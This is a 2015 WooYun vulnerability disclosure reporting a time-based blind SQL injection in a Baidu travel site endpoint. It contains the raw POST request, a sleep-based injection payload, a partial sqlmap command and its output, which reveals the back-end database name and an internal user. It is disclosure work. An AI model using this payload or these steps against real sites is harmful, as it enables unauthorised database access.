当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0146917

漏洞标题:百度某站存在SQL注入

相关厂商:百度

漏洞作者: 星明月稀

提交时间:2015-10-16 11:05

修复时间:2015-11-30 17:24

公开时间:2015-11-30 17:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-16: 细节已通知厂商并且等待厂商处理中
2015-10-16: 厂商已经确认,细节仅向厂商公开
2015-10-26: 细节向核心白帽子及相关领域专家公开
2015-11-05: 细节向普通白帽子公开
2015-11-15: 细节向实习白帽子公开
2015-11-30: 细节向公众公开

简要描述:

百度某站存在SQL注入

详细说明:

注入点:
管理补充:

mask 区域
1.://**.**.**//lvyou.baidu.com/notes/photo/getpicbyurlsformat=ajax&t=1444879192002" --data="pic_urls[]=b812c8fcc3cec3fd2bdf7c2dd088d43f86942781*&pic_urls[]=b8014a90f603738d547f3a7eb51bb051f819ecb1&pic_urls[]=4e4a20a4462309f7f7995747740e0cf3d6cad6f5&pic_urls[]=b3b7d0a20cf431ad6b22ba6c4d36acaf2fdd98f7&pic_urls[]=f2deb48f8c5494eefe6aba402bf5e0fe99257e1a&bdstoken=ce624b2cf0381d0c276adb0a4ee31fbd" --technique=T --dbs


POST http://lvyou.baidu.com/notes/photo/getpicbyurls?format=ajax&t=1444879192002
pic_urls[]=b812c8fcc3cec3fd2bdf7c2dd088d43f86942781&pic_urls[]=b8014a90f603738d547f3a7eb51bb051f819ecb1&pic_urls[]=4e4a20a4462309f7f7995747740e0cf3d6cad6f5&pic_urls[]=b3b7d0a20cf431ad6b22ba6c4d36acaf2fdd98f7&pic_urls[]=f2deb48f8c5494eefe6aba402bf5e0fe99257e1a&bdstoken=ce624b2cf0381d0c276adb0a4ee31fbd


参数:pic_urls[]
time-based blind

payload: ') and (select * from (select(sleep(5)))a) and ('aaa'='aaa

漏洞证明:

猜解current-db

[11:28:58] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.12
[11:28:58] [INFO] fetching current database
[11:28:58] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[11:28:58] [WARNING] time-based comparison requires larger statistical model, please wait..............................
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[11:29:17] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
a
[11:29:28] [INFO] adjusting time delay to 2 seconds due to good response times
lb_notes
current database: 'alb_notes'
[11:32:17] [INFO] fetched data logged to text files under '/root/.sqlmap/output/lvyou.baidu.com'


current user:    'alb_notes_w@10.208.10***

修复方案:

过滤转义。

版权声明:转载请注明来源 星明月稀@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-10-16 17:22

厂商回复:

感谢提交

最新状态:

暂无


漏洞评价:

评价